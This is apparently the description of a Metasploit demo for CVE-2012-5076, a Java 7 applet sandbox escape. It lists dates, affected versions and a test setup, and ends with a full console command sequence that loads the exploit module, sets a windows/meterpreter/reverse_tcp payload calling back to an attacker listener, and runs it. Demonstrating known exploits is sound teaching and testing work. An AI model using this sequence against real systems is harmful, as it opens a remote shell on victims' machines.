CVE-2012-5076 Java Applet AverageRangeStatisticImpl RCE Metasploit Demo
Vulnerability patched by Oracle in 2012 October CPU
Vulnerability discovered exploited in the wild by kafeine the 2012-11-09
First Metasploit PoC provided the 2012-11-11
Second Metasploit PoC provided the 2013-01-22
PoC provided by :
Affected version(s) :
Oracle Java version 7 Update 7 and earlier.
Tested on Windows 8 Pro with :
Internet Explorer 10
Oracle Java 7 Update 7
This module abuses the AverageRangeStatisticImpl from a Java Applet to run arbitrary Java code outside of the sandbox, a different exploit vector than the one exploited in the wild in November of 2012. The vulnerability affects Java version 7u7 and earlier.
use exploit/multi/browser/java_jre17_glassfish_averagerangestatisticimpl set SRVHOST 192.168.178.26 set TARGET 1 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.26 exploit getuid sysinfo